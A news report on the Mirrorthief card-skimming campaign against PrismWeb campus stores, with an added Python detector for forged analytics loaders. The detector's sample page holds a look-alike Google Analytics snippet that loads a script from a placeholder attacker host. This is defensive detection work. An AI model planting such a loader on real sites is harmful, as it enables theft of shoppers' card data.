Mirrorthief cybercrime group targets online campus stores in the US and Canada with card skimming malware
- The group has impacted 201 online campus stores in the United States and Canada.
- The group is using Trojan.JS.MIRRORTHEIF.AA to steal payment card and personal details of customers.
A recent Magecart-style credit card skimming attack has been linked to a new cybercrime group called Mirrorthief. The group has impacted 201 online campus stores in the United States and Canada.
What’s the matter?
According to a report from Trend Micro, the Mirrorthief hacking group is using a malicious skimming script - Trojan.JS.MIRRORTHEIF.AA - to steal payment card and personal details of customers. The attack against multiple campus store websites was detected by researchers on April 14, 2019.
The hackers injected the skimming script into the checkout pages of the websites, which consequently sent the stolen information to a remote server.
Which stores are compromised?
After a thorough investigation, the Trend Micro researchers learned that the Mirrorthief group compromised PrismWeb-based e-commerce websites. PrismWeb is an e-commerce platform designed for college stores by PrismRBS, a subsidiary of Nebraska Book Company.
How does Mirrorthief perform its skimming activity?
The skimming code was injected into the stores' checkout payment script, served from the following paths:
- hxxps://[online store domain]/innerweb/v4.0/include/js/checkout_payment[.]js
- hxxps://[online store domain]/innerweb/v3.1/include/js/checkout_payment[.]js
The injected malicious script is forged as a Google Analytics script.
“The injected script forged the Google Analytics script format, but loaded a different script from the attackers’ server. The loaded script is the main script that steals the payment information. Unlike many web skimmers, which are designed to collect information from many kinds of e-commerce payment pages in general, the skimmer that the Mirrorthief group used was designed specifically for PrismWeb’s payment page,” researchers added.
What information is stolen?
The skimmer collects data only from HTML elements with specific IDs on PrismWeb’s payment form. The stolen payment card information includes the card number, expiry date, card type, card verification number, and the cardholder’s name. The skimmer also steals personal billing information such as addresses and phone numbers.
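The forged loader described above imitates the Google Analytics snippet format but fetches its real payload from the attackers' server. As an added example (not from the Trend Micro report or this article), the following Python check parses a page's script tags and flags any loader, inline or external, that fetches code from a host outside an allowlist; the allowlist, the sample page and the `.invalid` attacker host are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Hosts the genuine GA loader fetches from (assumption: add your own hosts/CDNs).
ALLOWED_SCRIPT_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com"}
# GA-snippet markers: harmless alone, suspicious beside a non-allowlisted loader.
GA_MARKERS = ("GoogleAnalyticsObject", "google-analytics", "ga(")
# A dynamically created <script> whose src is a hard-coded absolute URL.
SRC_LITERAL = re.compile(r"""\.src\s*=\s*(['"])(?P<url>https?://[^'"]+)\1""")

def _offsite(url, allowed):
    # True for absolute URLs on hosts outside the allowlist; relative = first-party.
    host = urlparse(url).hostname
    return host is not None and host not in allowed

class _ScriptCollector(HTMLParser):
    # Collects external script URLs and inline script bodies from a page.
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def find_suspicious_loaders(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, url) per off-site script: 'external' for <script src>,
    'forged-ga' for an inline snippet imitating the GA format, else 'inline'."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = [("external", u) for u in parser.external if _offsite(u, allowed)]
    for body in parser.inline:
        kind = "forged-ga" if any(m in body for m in GA_MARKERS) else "inline"
        findings += [(kind, m.group("url")) for m in SRC_LITERAL.finditer(body)
                     if _offsite(m.group("url"), allowed)]
    return findings

# Constructed sample: a genuine GA include, then a look-alike snippet pointing
# its created <script> at a placeholder (.invalid) attacker host.
SAMPLE_PAGE = """<html><body>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;a=s.createElement(o);
a.src='https://analytics.example-attacker.invalid/ga.js';m=s.getElementsByTagName(o)[0];
m.parentNode.insertBefore(a,m)})(window,document,'script','','ga');</script></body></html>"""
```

Running `find_suspicious_loaders(SAMPLE_PAGE)` reports only the look-alike snippet, since the genuine analytics.js include resolves to an allowlisted host.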
What action has been taken?
PrismRBS has been informed about the attack and has since released an official statement regarding it. According to the statement, the company became aware of unauthorized third-party access to its e-commerce websites on April 26, 2019.
Upon learning of the incident, it immediately took steps to halt the attack. It has also initiated an investigation into the matter and notified law enforcement agencies and payment card companies.